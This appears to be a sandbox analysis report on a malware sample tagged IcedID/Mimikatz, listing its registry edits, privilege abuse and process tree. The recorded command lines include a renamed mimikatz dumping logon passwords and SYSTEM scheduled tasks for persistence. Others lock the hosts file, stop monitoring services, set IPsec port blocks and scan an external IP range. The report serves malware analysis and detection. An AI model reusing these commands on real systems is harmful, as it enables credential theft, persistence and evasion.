\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language umueiy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mgmtcbi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mgmtcbi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language liuibviiz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3264 cmd.exe 3888 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023cb6-6.dat nsis_installer_2 behavioral2/files/0x0008000000023ccd-15.dat nsis_installer_1 behavioral2/files/0x0008000000023ccd-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ mgmtcbi.exe Key created \REGISTRY\USER\.DEFAULT\Software iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" mgmtcbi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" mgmtcbi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" mgmtcbi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing mgmtcbi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" mgmtcbi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" mgmtcbi.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3888 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3532 schtasks.exe 4196 schtasks.exe 1564 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4748 2024-11-16_5a8185e3c49304f8f94aa2dafdafd5a5_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 4748 2024-11-16_5a8185e3c49304f8f94aa2dafdafd5a5_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3980 mgmtcbi.exe Token: SeDebugPrivilege 1500 mgmtcbi.exe Token: SeDebugPrivilege 2340 vfshost.exe Token: SeDebugPrivilege 4584 iyibcmiuc.exe Token: SeLockMemoryPrivilege 4488 ltbtbc.exe Token: SeLockMemoryPrivilege 4488 ltbtbc.exe Token: SeDebugPrivilege 4228 iyibcmiuc.exe Token: SeDebugPrivilege 572 iyibcmiuc.exe Token: SeDebugPrivilege 1280 iyibcmiuc.exe Token: SeDebugPrivilege 4268 iyibcmiuc.exe Token: SeDebugPrivilege 4888 iyibcmiuc.exe Token: SeDebugPrivilege 1724 iyibcmiuc.exe Token: SeDebugPrivilege 1568 iyibcmiuc.exe Token: SeDebugPrivilege 2780 iyibcmiuc.exe Token: SeDebugPrivilege 2436 iyibcmiuc.exe Token: SeDebugPrivilege 1444 iyibcmiuc.exe Token: SeDebugPrivilege 4860 iyibcmiuc.exe Token: SeDebugPrivilege 940 iyibcmiuc.exe Token: SeDebugPrivilege 1116 iyibcmiuc.exe Token: SeDebugPrivilege 244 iyibcmiuc.exe Token: SeDebugPrivilege 788 iyibcmiuc.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4748 2024-11-16_5a8185e3c49304f8f94aa2dafdafd5a5_hacktools_icedid_mimikatz.exe 4748 2024-11-16_5a8185e3c49304f8f94aa2dafdafd5a5_hacktools_icedid_mimikatz.exe 3980 mgmtcbi.exe 3980 mgmtcbi.exe 1500 mgmtcbi.exe 1500 mgmtcbi.exe 488 xohudmc.exe 5032 umueiy.exe 2396 mgmtcbi.exe 2396 mgmtcbi.exe 5260 mgmtcbi.exe 5260 mgmtcbi.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4748 wrote to memory of 3264 4748 2024-11-16_5a8185e3c49304f8f94aa2dafdafd5a5_hacktools_icedid_mimikatz.exe 84 PID 4748 wrote to memory of 3264 4748 2024-11-16_5a8185e3c49304f8f94aa2dafdafd5a5_hacktools_icedid_mimikatz.exe 84 PID 4748 wrote to memory of 3264 4748 2024-11-16_5a8185e3c49304f8f94aa2dafdafd5a5_hacktools_icedid_mimikatz.exe 84 PID 3264 wrote to memory of 3888 3264 cmd.exe 86 PID 3264 wrote to memory of 3888 3264 cmd.exe 86 PID 3264 wrote to memory of 3888 3264 cmd.exe 86 PID 3264 wrote to memory of 3980 3264 cmd.exe 93 PID 3264 wrote to memory of 3980 3264 cmd.exe 93 PID 3264 wrote to memory of 3980 3264 cmd.exe 93 PID 1500 wrote to memory of 1724 1500 mgmtcbi.exe 95 PID 1500 wrote to memory of 1724 1500 mgmtcbi.exe 95 PID 1500 wrote to memory of 1724 1500 mgmtcbi.exe 95 PID 1724 wrote to memory of 1196 1724 cmd.exe 97 PID 1724 wrote to memory of 1196 1724 cmd.exe 97 PID 1724 wrote to memory of 1196 1724 cmd.exe 97 PID 1724 wrote to memory of 1312 1724 cmd.exe 98 PID 1724 wrote to memory of 1312 1724 cmd.exe 98 PID 1724 wrote to memory of 1312 1724 cmd.exe 98 PID 1724 wrote to memory of 2332 1724 cmd.exe 99 PID 1724 wrote to memory of 2332 1724 cmd.exe 99 PID 1724 wrote to memory of 2332 1724 cmd.exe 99 PID 1724 wrote to memory of 936 1724 cmd.exe 100 PID 1724 wrote to memory of 936 1724 cmd.exe 100 PID 1724 wrote to memory of 936 1724 cmd.exe 100 PID 1724 wrote to memory of 4824 1724 cmd.exe 101 PID 1724 wrote to memory of 4824 1724 cmd.exe 101 PID 1724 wrote to memory of 4824 1724 cmd.exe 101 PID 1724 wrote to memory of 3152 1724 cmd.exe 102 PID 1724 wrote to memory of 3152 1724 cmd.exe 102 PID 1724 wrote to memory of 3152 1724 cmd.exe 102 PID 1500 wrote to memory of 1076 1500 mgmtcbi.exe 106 PID 1500 wrote to memory of 1076 1500 mgmtcbi.exe 106 PID 1500 wrote to memory of 1076 1500 mgmtcbi.exe 106 PID 1500 wrote to memory of 3392 1500 mgmtcbi.exe 108 PID 1500 wrote to memory of 3392 1500 mgmtcbi.exe 108 PID 1500 wrote to memory of 3392 1500 mgmtcbi.exe 108 PID 1500 wrote to memory of 2392 1500 mgmtcbi.exe 110 PID 1500 wrote to memory of 2392 1500 mgmtcbi.exe 110 PID 1500 wrote to memory of 2392 1500 mgmtcbi.exe 110 PID 1500 wrote to memory of 2140 1500 mgmtcbi.exe 114 PID 1500 wrote to memory of 2140 1500 mgmtcbi.exe 114 PID 1500 wrote to memory of 2140 1500 mgmtcbi.exe 114 PID 2140 wrote to memory of 3028 2140 cmd.exe 116 PID 2140 wrote to memory of 3028 2140 cmd.exe 116 PID 2140 wrote to memory of 3028 2140 cmd.exe 116 PID 3028 wrote to memory of 1668 3028 wpcap.exe 117 PID 3028 wrote to memory of 1668 3028 wpcap.exe 117 PID 3028 wrote to memory of 1668 3028 wpcap.exe 117 PID 1668 wrote to memory of 448 1668 net.exe 119 PID 1668 wrote to memory of 448 1668 net.exe 119 PID 1668 wrote to memory of 448 1668 net.exe 119 PID 3028 wrote to memory of 4368 3028 wpcap.exe 120 PID 3028 wrote to memory of 4368 3028 wpcap.exe 120 PID 3028 wrote to memory of 4368 3028 wpcap.exe 120 PID 4368 wrote to memory of 4388 4368 net.exe 122 PID 4368 wrote to memory of 4388 4368 net.exe 122 PID 4368 wrote to memory of 4388 4368 net.exe 122 PID 3028 wrote to memory of 4004 3028 wpcap.exe 123 PID 3028 wrote to memory of 4004 3028 wpcap.exe 123 PID 3028 wrote to memory of 4004 3028 wpcap.exe 123 PID 4004 wrote to memory of 5072 4004 net.exe 125 PID 4004 wrote to memory of 5072 4004 net.exe 125 PID 4004 wrote to memory of 5072 4004 net.exe 125 PID 3028 wrote to memory of 3608 3028 wpcap.exe 126
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1692
-
C:\Windows\TEMP\untipbtiz\ltbtbc.exe"C:\Windows\TEMP\untipbtiz\ltbtbc.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4488
-
-
C:\Users\Admin\AppData\Local\Temp\2024-11-16_5a8185e3c49304f8f94aa2dafdafd5a5_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-16_5a8185e3c49304f8f94aa2dafdafd5a5_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4748 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ybemumnz\mgmtcbi.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3264 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3888
-
-
C:\Windows\ybemumnz\mgmtcbi.exeC:\Windows\ybemumnz\mgmtcbi.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3980
-
-
-
C:\Windows\ybemumnz\mgmtcbi.exeC:\Windows\ybemumnz\mgmtcbi.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1196
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:1312
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2332
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4824
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:3152
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1076
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3392
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2392
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\jhetmctcv\bctzbzczb\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\jhetmctcv\bctzbzczb\wpcap.exeC:\Windows\jhetmctcv\bctzbzczb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:448
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4388
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:5072
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:3608 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:2560
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1480
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:3648 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2156
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1196 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:664 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4168
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\jhetmctcv\bctzbzczb\liuibviiz.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\jhetmctcv\bctzbzczb\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:4888 -
C:\Windows\jhetmctcv\bctzbzczb\liuibviiz.exeC:\Windows\jhetmctcv\bctzbzczb\liuibviiz.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\jhetmctcv\bctzbzczb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\jhetmctcv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\jhetmctcv\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2036 -
C:\Windows\jhetmctcv\Corporate\vfshost.exeC:\Windows\jhetmctcv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "jbemublie" /ru system /tr "cmd /c C:\Windows\ime\mgmtcbi.exe"2⤵PID:3132
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1656
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "jbemublie" /ru system /tr "cmd /c C:\Windows\ime\mgmtcbi.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "umbbbtict" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ybemumnz\mgmtcbi.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3012 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1296
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "umbbbtict" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ybemumnz\mgmtcbi.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4196
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bwctviivv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\untipbtiz\ltbtbc.exe /p everyone:F"2⤵PID:1060
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:5092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bwctviivv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\untipbtiz\ltbtbc.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1564
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5040
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3024
-
-
